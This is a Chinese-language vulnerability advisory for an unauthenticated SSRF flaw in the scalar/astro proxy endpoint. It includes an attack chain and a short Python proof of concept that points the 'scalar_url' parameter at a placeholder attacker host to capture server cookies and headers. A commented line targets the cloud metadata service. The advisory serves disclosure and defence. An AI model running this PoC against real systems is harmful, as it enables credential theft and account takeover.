CVE-2026-30118 CVSS 9.8 严重

CVE-2026-30118 scalar/astro SSRF漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30118

漏洞类型

SSRF (服务端请求伪造)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

scalar/astro

漏洞概述

scalar/astro v0.1.13版本中的Scalar代理端点存在服务端请求伪造（SSRF）漏洞。攻击者可通过`scalar_url`查询参数构造恶意请求，迫使后端服务器向攻击者控制的URL发送HTTP请求。该漏洞无需身份认证即可利用，可能导致认证Cookie和请求头泄露，进而引发权限提升风险。

技术细节

该漏洞源于scalar/astro v0.1.13版本在处理Scalar代理端点请求时，未对`scalar_url`参数进行充分的校验和过滤。由于缺乏有效的URL白名单或内网IP限制机制，未经身份认证的远程攻击者可以注入任意URL。当后端服务处理该请求时，会向攻击者指定的目标发起HTTP连接。利用此特性，攻击者可以探测内网端口、读取云元数据（如AWS IAM凭证），或者利用服务器身份访问受限资源。此外，由于请求会携带服务端的认证Cookie和Headers，攻击者可能通过劫持这些凭据实现账户接管（ATO）或权限提升，造成严重的数据泄露和系统控制权丢失。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标运行的是scalar/astro v0.1.13版本，并确认存在Scalar代理端点。

STEP 2

2. 利用

攻击者向代理端点发送特制的HTTP请求，在`scalar_url`参数中填入攻击者控制的URL（如数据接收服务器）。

STEP 3

3. 请求伪造

后端服务器解析请求，并未过滤参数，直接向攻击者指定的URL发起HTTP连接，并携带服务端的认证Headers。

STEP 4

4. 数据泄露与提权

攻击者的服务器接收到请求，从中提取敏感Cookie或Headers。利用这些凭据，攻击者模拟合法用户身份，实现账户接管（ATO）或权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-30118
# Target: scalar/astro v0.1.13

import requests

def exploit_ssrf(target_host, malicious_url):
    """Exploit the SSRF vulnerability via scalar_url parameter."""
    url = f"{target_host}/proxy"
    params = {
        "scalar_url": malicious_url
    }
    
    try:
        response = requests.get(url, params=params, timeout=5)
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text[:200]}")
        if response.status_code == 200:
            print("[+] SSRF Triggered successfully!")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Example: Pointing to a burp collaborator or internal metadata service
    target = "http://localhost:3000" 
    # malicious_url = "http://169.254.169.254/latest/meta-data/" 
    malicious_url = "http://attacker-controlled-domain.com/capture"
    exploit_ssrf(target, malicious_url)

影响范围

scalar/astro v0.1.13

防御指南

临时缓解措施

建议立即升级到修复版本。若无法立即升级，应通过WAF拦截包含恶意URL特征的`scalar_url`参数请求，并严格限制后端服务器的出站网络访问权限，仅允许必要的业务通信。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表